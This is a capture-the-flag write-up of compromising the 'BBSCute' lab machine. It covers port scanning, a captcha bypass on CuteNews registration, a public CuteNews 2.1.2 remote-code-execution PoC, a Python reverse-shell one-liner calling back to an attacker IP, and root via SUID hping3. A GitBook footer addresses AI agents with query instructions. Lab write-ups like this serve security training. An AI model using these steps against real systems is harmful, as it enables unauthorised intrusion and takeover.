> For the complete documentation index, see [llms.txt](https://viperone.gitbook.io/pentest-everything/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/bbscute.md). # BBSCute ## Nmap ``` sudo nmap 192.168.120.128 -p- -sS -sV 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 88/tcp open http nginx 1.14.2 110/tcp open pop3 Courier pop3d 995/tcp open ssl/pop3 Courier pop3d Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Navigating to port 80 in the browser lands us on the default install page for Apache. ![](/files/-MXIIlLvIdbdFnu0ALNW) Running `dirsearch.py` against the target web servers reveals index.php ``` python3 dirsearch.py -u http://192.168.120.128 -w /usr/share/seclists/Discovery/Web-Content/common.txt -r -t 60 --full-url ``` ![](/files/-MXIIxl749yPPlTmwoIp) Index.php takes us to the login page for CuteNews. I tried some default credentials and was unable to access the system. ![](/files/-MXIJ5rhWdIedAjzIdB5) Instead we can register ourselves as a new user to access. On the register new user page we are not able to load the captcha which stops us from proceeding: ![/index.php?register](/files/-MXIJYgE2p5GBgr5o3S6) Reviewing the source of this page shows we do have a link for captcha.php. ![](/files/-MXIJolSZs8iGsxPxxb4) Viewing this will show what the current captcha should be. ![/captcha.php](/files/-MXIK67Gr7zNcqvRazYA) Entering this into the registration field will allow us to proceed with new user creation. ![](/files/-MXIKHigSN64BSr2VUvg) We can see that we are running CuteNews 2.1.2 as per the footer of the page. Searching for exploits with `searchsploit` shows the results below. ![](/files/-MXINbV42dq4tBEbiF8A) Searching further on Google for exploits we come across a PoC on GitHub located here: . Download the python script and the `sad.gif` files to the same directory. Run with the syntax shown below. ``` python3 http://192.168.120.128/index.php ``` ![](/files/-MXIpGzstxFADzC0GBUA) We can now run the following command to get a more usable reverse shell on a different listener: ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.120",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")' ``` ![](/files/-MXIqw09jqzzcswUJhcc) From here I uploaded `linpeas` which after executing identified the binary hping3 as having a SUID bit set. Meaning we can execute the binary with root permissions. ![](/files/-MXIvhN7sei7cHxuEll5) Then as per [GTFOBins](https://gtfobins.github.io/gtfobins/hping3/) we can executed with the SUID bit to gain a root shell. ![](/files/-MXIvtXz8NTmF2wb-0It) ``` /usr/sbin/hping3 /bin/sh -p OR ./hping3 /bin/sh -p ``` ![](/files/-MXIw8aNK7Wo98lbgtoC) --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/bbscute.md?ask=&goal= ``` `ask` is the immediate question: it should be specific, self-contained, and written in natural language. `goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.